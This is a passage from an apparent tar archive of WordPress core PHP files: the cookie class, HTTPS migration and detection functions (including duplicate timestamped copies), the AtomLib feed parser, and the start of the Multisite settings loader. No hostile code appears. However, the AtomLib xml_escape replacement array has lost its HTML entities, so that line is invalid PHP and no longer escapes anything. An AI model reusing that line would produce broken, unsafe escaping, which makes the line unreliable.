* HTTP API: WP_Http_Cookie class
*
* @package WordPress
* @subpackage HTTP
* @since 4.4.0
*/
/**
* Core class used to encapsulate a single cookie object for internal use.
*
* Returned cookies are represented using this class, and when cookies are set, if they are not
* already a WP_Http_Cookie() object, then they are turned into one.
*
* @todo The WordPress convention is to use underscores instead of camelCase for function and method
* names. Need to switch to use underscores instead for the methods.
*
* @since 2.8.0
*/
#[AllowDynamicProperties]
class WP_Http_Cookie {
/**
* Cookie name.
*
* @since 2.8.0
*
* @var string
*/
public $name;
/**
* Cookie value.
*
* @since 2.8.0
*
* @var string
*/
public $value;
/**
* When the cookie expires. Unix timestamp or formatted date.
*
* @since 2.8.0
*
* @var string|int|null
*/
public $expires;
/**
* Cookie URL path.
*
* @since 2.8.0
*
* @var string
*/
public $path;
/**
* Cookie Domain.
*
* @since 2.8.0
*
* @var string
*/
public $domain;
/**
* Cookie port or comma-separated list of ports.
*
* @since 2.8.0
*
* @var int|string
*/
public $port;
/**
* host-only flag.
*
* @since 5.2.0
*
* @var bool
*/
public $host_only;
/**
* Sets up this cookie object.
*
* The parameter $data should be either an associative array containing the indices names below
* or a header string detailing it.
*
* @since 2.8.0
* @since 5.2.0 Added `host_only` to the `$data` parameter.
*
* @param string|array $data {
* Raw cookie data as header string or data array.
*
* @type string $name Cookie name.
* @type mixed $value Value. Should NOT already be urlencoded.
* @type string|int|null $expires Optional. Unix timestamp or formatted date. Default null.
* @type string $path Optional. Path. Default '/'.
* @type string $domain Optional. Domain. Default host of parsed $requested_url.
* @type int|string $port Optional. Port or comma-separated list of ports. Default null.
* @type bool $host_only Optional. host-only storage flag. Default true.
* }
* @param string $requested_url The URL which the cookie was set on, used for default $domain
* and $port values.
*/
public function __construct( $data, $requested_url = '' ) {
if ( $requested_url ) {
$parsed_url = parse_url( $requested_url );
}
if ( isset( $parsed_url['host'] ) ) {
$this->domain = $parsed_url['host'];
}
$this->path = isset( $parsed_url['path'] ) ? $parsed_url['path'] : '/';
if ( ! str_ends_with( $this->path, '/' ) ) {
$this->path = dirname( $this->path ) . '/';
}
if ( is_string( $data ) ) {
// Assume it's a header string direct from a previous request.
$pairs = explode( ';', $data );
// Special handling for first pair; name=value. Also be careful of "=" in value.
$name = trim( substr( $pairs[0], 0, strpos( $pairs[0], '=' ) ) );
$value = substr( $pairs[0], strpos( $pairs[0], '=' ) + 1 );
$this->name = $name;
$this->value = urldecode( $value );
// Removes name=value from items.
array_shift( $pairs );
// Set everything else as a property.
foreach ( $pairs as $pair ) {
$pair = rtrim( $pair );
// Handle the cookie ending in ; which results in an empty final pair.
if ( empty( $pair ) ) {
continue;
}
list( $key, $val ) = strpos( $pair, '=' ) ? explode( '=', $pair ) : array( $pair, '' );
$key = strtolower( trim( $key ) );
if ( 'expires' === $key ) {
$val = strtotime( $val );
}
$this->$key = $val;
}
} else {
if ( ! isset( $data['name'] ) ) {
return;
}
// Set properties based directly on parameters.
foreach ( array( 'name', 'value', 'path', 'domain', 'port', 'host_only' ) as $field ) {
if ( isset( $data[ $field ] ) ) {
$this->$field = $data[ $field ];
}
}
if ( isset( $data['expires'] ) ) {
$this->expires = is_int( $data['expires'] ) ? $data['expires'] : strtotime( $data['expires'] );
} else {
$this->expires = null;
}
}
}
/**
* Confirms that it's OK to send this cookie to the URL checked against.
*
* Decision is based on RFC 2109/2965, so look there for details on validity.
*
* @since 2.8.0
*
* @param string $url URL you intend to send this cookie to
* @return bool true if allowed, false otherwise.
*/
public function test( $url ) {
if ( is_null( $this->name ) ) {
return false;
}
// Expires - if expired then nothing else matters.
if ( isset( $this->expires ) && time() > $this->expires ) {
return false;
}
// Get details on the URL we're thinking about sending to.
$url = parse_url( $url );
$url['port'] = isset( $url['port'] ) ? $url['port'] : ( 'https' === $url['scheme'] ? 443 : 80 );
$url['path'] = isset( $url['path'] ) ? $url['path'] : '/';
// Values to use for comparison against the URL.
$path = isset( $this->path ) ? $this->path : '/';
$port = isset( $this->port ) ? $this->port : null;
$domain = isset( $this->domain ) ? strtolower( $this->domain ) : strtolower( $url['host'] );
if ( false === stripos( $domain, '.' ) ) {
$domain .= '.local';
}
// Host - very basic check that the request URL ends with the domain restriction (minus leading dot).
$domain = ( str_starts_with( $domain, '.' ) ) ? substr( $domain, 1 ) : $domain;
if ( ! str_ends_with( $url['host'], $domain ) ) {
return false;
}
// Port - supports "port-lists" in the format: "80,8000,8080".
if ( ! empty( $port ) && ! in_array( $url['port'], array_map( 'intval', explode( ',', $port ) ), true ) ) {
return false;
}
// Path - request path must start with path restriction.
if ( ! str_starts_with( $url['path'], $path ) ) {
return false;
}
return true;
}
/**
* Convert cookie name and value back to header string.
*
* @since 2.8.0
*
* @return string Header encoded cookie name and value.
*/
public function getHeaderValue() { // phpcs:ignore WordPress.NamingConventions.ValidFunctionName.MethodNameInvalid
if ( ! isset( $this->name ) || ! isset( $this->value ) ) {
return '';
}
/**
* Filters the header-encoded cookie value.
*
* @since 3.4.0
*
* @param string $value The cookie value.
* @param string $name The cookie name.
*/
return $this->name . '=' . apply_filters( 'wp_http_cookie_value', $this->value, $this->name );
}
/**
* Retrieve cookie header for usage in the rest of the WordPress HTTP API.
*
* @since 2.8.0
*
* @return string
*/
public function getFullHeader() { // phpcs:ignore WordPress.NamingConventions.ValidFunctionName.MethodNameInvalid
return 'Cookie: ' . $this->getHeaderValue();
}
/**
* Retrieves cookie attributes.
*
* @since 4.6.0
*
* @return array {
* List of attributes.
*
* @type string|int|null $expires When the cookie expires. Unix timestamp or formatted date.
* @type string $path Cookie URL path.
* @type string $domain Cookie domain.
* }
*/
public function get_attributes() {
return array(
'expires' => $this->expires,
'path' => $this->path,
'domain' => $this->domain,
);
}
}
https-migration-20260605175519-20260621081201-20260621151840.php 0000666 00000011205 15224151220 0014740 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
atomlib-20260621170512.php 0000666 00000027625 15224151220 0010276 0 ustar 00 <?php
/**
* Atom Syndication Format PHP Library
*
* @package AtomLib
* @link http://code.google.com/p/phpatomlib/
*
* @author Elias Torres <elias@torrez.us>
* @version 0.4
* @since 2.3.0
*/
/**
* Structure that store common Atom Feed Properties
*
* @package AtomLib
*/
class AtomFeed {
/**
* Stores Links
* @var array
* @access public
*/
var $links = array();
/**
* Stores Categories
* @var array
* @access public
*/
var $categories = array();
/**
* Stores Entries
*
* @var array
* @access public
*/
var $entries = array();
}
/**
* Structure that store Atom Entry Properties
*
* @package AtomLib
*/
class AtomEntry {
/**
* Stores Links
* @var array
* @access public
*/
var $links = array();
/**
* Stores Categories
* @var array
* @access public
*/
var $categories = array();
}
/**
* AtomLib Atom Parser API
*
* @package AtomLib
*/
class AtomParser {
var $NS = 'http://www.w3.org/2005/Atom';
var $ATOM_CONTENT_ELEMENTS = array('content','summary','title','subtitle','rights');
var $ATOM_SIMPLE_ELEMENTS = array('id','updated','published','draft');
var $debug = false;
var $depth = 0;
var $indent = 2;
var $in_content;
var $ns_contexts = array();
var $ns_decls = array();
var $content_ns_decls = array();
var $content_ns_contexts = array();
var $is_xhtml = false;
var $is_html = false;
var $is_text = true;
var $skipped_div = false;
var $FILE = "php://input";
var $feed;
var $current;
var $map_attrs_func;
var $map_xmlns_func;
var $error;
var $content;
/**
* PHP5 constructor.
*/
function __construct() {
$this->feed = new AtomFeed();
$this->current = null;
$this->map_attrs_func = array( __CLASS__, 'map_attrs' );
$this->map_xmlns_func = array( __CLASS__, 'map_xmlns' );
}
/**
* PHP4 constructor.
*/
public function AtomParser() {
self::__construct();
}
/**
* Map attributes to key="val"
*
* @param string $k Key
* @param string $v Value
* @return string
*/
public static function map_attrs($k, $v) {
return "$k=\"$v\"";
}
/**
* Map XML namespace to string.
*
* @param indexish $p XML Namespace element index
* @param array $n Two-element array pair. [ 0 => {namespace}, 1 => {url} ]
* @return string 'xmlns="{url}"' or 'xmlns:{namespace}="{url}"'
*/
public static function map_xmlns($p, $n) {
$xd = "xmlns";
if( 0 < strlen($n[0]) ) {
$xd .= ":{$n[0]}";
}
return "{$xd}=\"{$n[1]}\"";
}
function _p($msg) {
if($this->debug) {
print str_repeat(" ", $this->depth * $this->indent) . $msg ."\n";
}
}
function error_handler($log_level, $log_text, $error_file, $error_line) {
$this->error = $log_text;
}
function parse() {
set_error_handler(array(&$this, 'error_handler'));
array_unshift($this->ns_contexts, array());
if ( ! function_exists( 'xml_parser_create_ns' ) ) {
trigger_error( __( "PHP's XML extension is not available. Please contact your hosting provider to enable PHP's XML extension." ) );
return false;
}
$parser = xml_parser_create_ns();
xml_set_element_handler($parser, array($this, "start_element"), array($this, "end_element"));
xml_parser_set_option($parser,XML_OPTION_CASE_FOLDING,0);
xml_parser_set_option($parser,XML_OPTION_SKIP_WHITE,0);
xml_set_character_data_handler($parser, array($this, "cdata"));
xml_set_default_handler($parser, array($this, "_default"));
xml_set_start_namespace_decl_handler($parser, array($this, "start_ns"));
xml_set_end_namespace_decl_handler($parser, array($this, "end_ns"));
$this->content = '';
$ret = true;
$fp = fopen($this->FILE, "r");
while ($data = fread($fp, 4096)) {
if($this->debug) $this->content .= $data;
if(!xml_parse($parser, $data, feof($fp))) {
/* translators: 1: Error message, 2: Line number. */
trigger_error(sprintf(__('XML Error: %1$s at line %2$s')."\n",
xml_error_string(xml_get_error_code($parser)),
xml_get_current_line_number($parser)));
$ret = false;
break;
}
}
fclose($fp);
if (PHP_VERSION_ID < 80000) { // xml_parser_free() has no effect as of PHP 8.0.
xml_parser_free($parser);
}
unset($parser);
restore_error_handler();
return $ret;
}
function start_element($parser, $name, $attrs) {
$name_parts = explode(":", $name);
$tag = array_pop($name_parts);
switch($name) {
case $this->NS . ':feed':
$this->current = $this->feed;
break;
case $this->NS . ':entry':
$this->current = new AtomEntry();
break;
};
$this->_p("start_element('$name')");
#$this->_p(print_r($this->ns_contexts,true));
#$this->_p('current(' . $this->current . ')');
array_unshift($this->ns_contexts, $this->ns_decls);
$this->depth++;
if(!empty($this->in_content)) {
$this->content_ns_decls = array();
if($this->is_html || $this->is_text)
trigger_error("Invalid content in element found. Content must not be of type text or html if it contains markup.");
$attrs_prefix = array();
// resolve prefixes for attributes
foreach($attrs as $key => $value) {
$with_prefix = $this->ns_to_prefix($key, true);
$attrs_prefix[$with_prefix[1]] = $this->xml_escape($value);
}
$attrs_str = join(' ', array_map($this->map_attrs_func, array_keys($attrs_prefix), array_values($attrs_prefix)));
if(strlen($attrs_str) > 0) {
$attrs_str = " " . $attrs_str;
}
$with_prefix = $this->ns_to_prefix($name);
if(!$this->is_declared_content_ns($with_prefix[0])) {
array_push($this->content_ns_decls, $with_prefix[0]);
}
$xmlns_str = '';
if(count($this->content_ns_decls) > 0) {
array_unshift($this->content_ns_contexts, $this->content_ns_decls);
$xmlns_str .= join(' ', array_map($this->map_xmlns_func, array_keys($this->content_ns_contexts[0]), array_values($this->content_ns_contexts[0])));
if(strlen($xmlns_str) > 0) {
$xmlns_str = " " . $xmlns_str;
}
}
array_push($this->in_content, array($tag, $this->depth, "<". $with_prefix[1] ."{$xmlns_str}{$attrs_str}" . ">"));
} else if(in_array($tag, $this->ATOM_CONTENT_ELEMENTS) || in_array($tag, $this->ATOM_SIMPLE_ELEMENTS)) {
$this->in_content = array();
$this->is_xhtml = $attrs['type'] == 'xhtml';
$this->is_html = $attrs['type'] == 'html' || $attrs['type'] == 'text/html';
$this->is_text = !in_array('type',array_keys($attrs)) || $attrs['type'] == 'text';
$type = $this->is_xhtml ? 'XHTML' : ($this->is_html ? 'HTML' : ($this->is_text ? 'TEXT' : $attrs['type']));
if(in_array('src',array_keys($attrs))) {
$this->current->$tag = $attrs;
} else {
array_push($this->in_content, array($tag,$this->depth, $type));
}
} else if($tag == 'link') {
array_push($this->current->links, $attrs);
} else if($tag == 'category') {
array_push($this->current->categories, $attrs);
}
$this->ns_decls = array();
}
function end_element($parser, $name) {
$name_parts = explode(":", $name);
$tag = array_pop($name_parts);
$ccount = count($this->in_content);
# if we are *in* content, then let's proceed to serialize it
if(!empty($this->in_content)) {
# if we are ending the original content element
# then let's finalize the content
if($this->in_content[0][0] == $tag &&
$this->in_content[0][1] == $this->depth) {
$origtype = $this->in_content[0][2];
array_shift($this->in_content);
$newcontent = array();
foreach($this->in_content as $c) {
if(count($c) == 3) {
array_push($newcontent, $c[2]);
} else {
if($this->is_xhtml || $this->is_text) {
array_push($newcontent, $this->xml_escape($c));
} else {
array_push($newcontent, $c);
}
}
}
if(in_array($tag, $this->ATOM_CONTENT_ELEMENTS)) {
$this->current->$tag = array($origtype, join('',$newcontent));
} else {
$this->current->$tag = join('',$newcontent);
}
$this->in_content = array();
} else if($this->in_content[$ccount-1][0] == $tag &&
$this->in_content[$ccount-1][1] == $this->depth) {
$this->in_content[$ccount-1][2] = substr($this->in_content[$ccount-1][2],0,-1) . "/>";
} else {
# else, just finalize the current element's content
$endtag = $this->ns_to_prefix($name);
array_push($this->in_content, array($tag, $this->depth, "</$endtag[1]>"));
}
}
array_shift($this->ns_contexts);
$this->depth--;
if($name == ($this->NS . ':entry')) {
array_push($this->feed->entries, $this->current);
$this->current = null;
}
$this->_p("end_element('$name')");
}
function start_ns($parser, $prefix, $uri) {
$this->_p("starting: " . $prefix . ":" . $uri);
array_push($this->ns_decls, array($prefix,$uri));
}
function end_ns($parser, $prefix) {
$this->_p("ending: #" . $prefix . "#");
}
function cdata($parser, $data) {
$this->_p("data: #" . str_replace(array("\n"), array("\\n"), trim($data)) . "#");
if(!empty($this->in_content)) {
array_push($this->in_content, $data);
}
}
function _default($parser, $data) {
# when does this gets called?
}
function ns_to_prefix($qname, $attr=false) {
# split 'http://www.w3.org/1999/xhtml:div' into ('http','//www.w3.org/1999/xhtml','div')
$components = explode(":", $qname);
# grab the last one (e.g 'div')
$name = array_pop($components);
if(!empty($components)) {
# re-join back the namespace component
$ns = join(":",$components);
foreach($this->ns_contexts as $context) {
foreach($context as $mapping) {
if($mapping[1] == $ns && strlen($mapping[0]) > 0) {
return array($mapping, "$mapping[0]:$name");
}
}
}
}
if($attr) {
return array(null, $name);
} else {
foreach($this->ns_contexts as $context) {
foreach($context as $mapping) {
if(strlen($mapping[0]) == 0) {
return array($mapping, $name);
}
}
}
}
}
function is_declared_content_ns($new_mapping) {
foreach($this->content_ns_contexts as $context) {
foreach($context as $mapping) {
if($new_mapping == $mapping) {
return true;
}
}
}
return false;
}
function xml_escape($content)
{
return str_replace(array('&','"',"'",'<','>'),
array('&','"',''','<','>'),
$content );
}
}
https-migration-20260605101354.php 0000666 00000011205 15224151220 0011763 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260606052425-20260621081111.php 0000666 00000013341 15224151220 0013334 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
ms-settings.php 0000666 00000010154 15224151220 0007531 0 ustar 00 <?php
/**
* Used to set up and fix common variables and include
* the Multisite procedural and class library.
*
* Allows for some configuration in wp-config.php (see ms-default-constants.php)
*
* @package WordPress
* @subpackage Multisite
* @since 3.0.0
*/
// Don't load directly.
if ( ! defined( 'ABSPATH' ) ) {
die( '-1' );
}
/**
* Objects representing the current network and current site.
*
* These may be populated through a custom `sunrise.php`. If not, then this
* file will attempt to populate them based on the current request.
*
* @since 3.0.0
*
* @global WP_Network $current_site The current network.
* @global object $current_blog The current site.
* @global string $domain Deprecated. The domain of the site found on load.
* Use `get_site()->domain` instead.
* @global string $path Deprecated. The path of the site found on load.
* Use `get_site()->path` instead.
* @global int $site_id Deprecated. The ID of the network found on load.
* Use `get_current_network_id()` instead.
* @global bool $public Deprecated. Whether the site found on load is public.
* Use `get_site()->public` instead.
*/
global $current_site, $current_blog, $domain, $path, $site_id, $public;
/** WP_Network class */
require_once ABSPATH . WPINC . '/class-wp-network.php';
/** WP_Site class */
require_once ABSPATH . WPINC . '/class-wp-site.php';
/** Multisite loader */
require_once ABSPATH . WPINC . '/ms-load.php';
/** Default Multisite constants */
require_once ABSPATH . WPINC . '/ms-default-constants.php';
if ( defined( 'SUNRISE' ) ) {
include_once WP_CONTENT_DIR . '/sunrise.php';
}
/** Check for and define SUBDOMAIN_INSTALL and the deprecated VHOST constant. */
ms_subdomain_constants();
// This block will process a request if the current network or current site objects
// have not been populated in the global scope through something like `sunrise.php`.
if ( ! isset( $current_site ) || ! isset( $current_blog ) ) {
$domain = strtolower( stripslashes( $_SERVER['HTTP_HOST'] ?? '' ) );
if ( str_ends_with( $domain, ':80' ) ) {
$domain = substr( $domain, 0, -3 );
$_SERVER['HTTP_HOST'] = substr( $_SERVER['HTTP_HOST'], 0, -3 );
} elseif ( str_ends_with( $domain, ':443' ) ) {
$domain = substr( $domain, 0, -4 );
$_SERVER['HTTP_HOST'] = substr( $_SERVER['HTTP_HOST'], 0, -4 );
}
$path = stripslashes( $_SERVER['REQUEST_URI'] );
if ( is_admin() ) {
$path = preg_replace( '#(.*)/wp-admin/.*#', '$1/', $path );
}
list( $path ) = explode( '?', $path );
$bootstrap_result = ms_load_current_site_and_network( $domain, $path, is_subdomain_install() );
if ( true === $bootstrap_result ) {
// `$current_blog` and `$current_site` are now populated.
} elseif ( false === $bootstrap_result ) {
ms_not_installed( $domain, $path );
} else {
header( 'Location: ' . $bootstrap_result );
exit;
}
unset( $bootstrap_result );
$blog_id = $current_blog->blog_id;
$public = $current_blog->public;
if ( empty( $current_blog->site_id ) ) {
// This dates to [MU134] and shouldn't be relevant anymore,
// but it could be possible for arguments passed to insert_blog() etc.
$current_blog->site_id = 1;
}
$site_id = $current_blog->site_id;
wp_load_core_site_options( $site_id );
}
$wpdb->set_prefix( $table_prefix, false ); // $table_prefix can be set in sunrise.php.
$wpdb->set_blog_id( $current_blog->blog_id, $current_blog->site_id );
$table_prefix = $wpdb->get_blog_prefix();
$_wp_switched_stack = array();
$switched = false;
// Need to init cache again after blog_id is set.
wp_start_object_cache();
if ( ! $current_site instanceof WP_Network ) {
$current_site = new WP_Network( $current_site );
}
if ( ! $current_blog instanceof WP_Site ) {
$current_blog = new WP_Site( $current_blog );
}
// Define upload directory constants.
ms_upload_constants();
/**
